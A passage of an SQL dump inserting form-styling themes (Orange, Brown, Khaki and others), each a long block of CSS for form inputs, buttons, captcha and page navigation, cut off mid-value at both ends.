!important;\nmargin:1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder-width: 1px !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder-width:1px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #ffffff !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#ffffff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#333 !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#84857D !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#000000 !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:1px solid black !important;\nbackground-color:#84857D !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 15px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 15px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 15px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 15px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}', 0),
(3, 'Style 1 Orange', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n.wdform_table1 button\n{\n	background-image:none !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:center;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#F06E00 !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:19px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:0px !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #ffffff !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#ffffff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#F06E00 !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#58B8EA !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#F06E00 !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:0px !important;\nbackground-color:#58B8EA !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#58B8EA !important;\nborder: 0px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#58B8EA !important;\nborder: 0px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder: 0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#58B8EA !important;\nborder: 0px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#58B8EA !important;\nborder: 0px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}', 0),
(4, 'Style 1 Brown ', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:center;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#702400 !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:19px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:0px !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #ffffff !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#ffffff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#702400 !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#702400 !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:0px !important;\nbackground-color:#000 !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 11px !important;\nfont-weight: bold !important;\nborder-radius:7px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 11px !important;\nfont-weight: bold !important;\nborder-radius:7px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder: 0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 7px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 11px !important;\nfont-weight: bold !important;\nborder-radius: 7px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size:11px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}', 0),
(5, 'Style 1 Khaki', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:center;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#FED69B !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:21px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:17px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_colon\n{\ncolor:#000 !important;\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000 !important;\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nheight:17px !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000 !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:17px !important;\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000 !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#FED69B !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#FED69B !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:0px !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) 